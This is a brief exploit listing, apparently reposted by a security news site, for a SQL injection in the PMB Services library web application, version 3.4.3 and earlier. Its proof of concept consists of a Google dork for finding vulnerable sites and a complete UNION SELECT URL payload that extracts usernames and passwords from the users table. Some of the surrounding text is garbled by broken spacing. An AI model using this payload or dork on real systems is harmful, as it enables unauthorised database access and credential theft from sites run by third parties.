PMB Services <= 3.4.3 SQL injection vulnerability-vulnerability warning-the black bar safety net

ID MYHACK58:62201128980
Type myhack58
Reporter 佚名
Modified 2011-02-04T00:00:00


PMB Services is a France php web application, PMB Services <=3.4.3 of the index. php existssql injectionvulnerabilities that could lead to sensitive information disclosure.

[+]info: ~~~~~~~~~

Exploit Title: [ PMB Services <= 3.4.3 Remote SQL Injection ]

Author : Luchador

Date : 29-01-2011

Location : Algeria

Site :

Critical Lvl : Dangerous

Mail: nourie. tlm[at]

[+]poc: ~~~~~~~~~ - Remote SQL Injection

dork : inurl:opac_css or inurl:index. php? lvl=coll_see&id=


~~~~~~~~~[path pmb]/index. php? lvl=coll_see&id=-1//union//select+1,2,3,unhex(hex(group_CONCAT(username,0x3a,pwd))),5,6,7+from+users--

[+]Reference: ~~~~~~~~~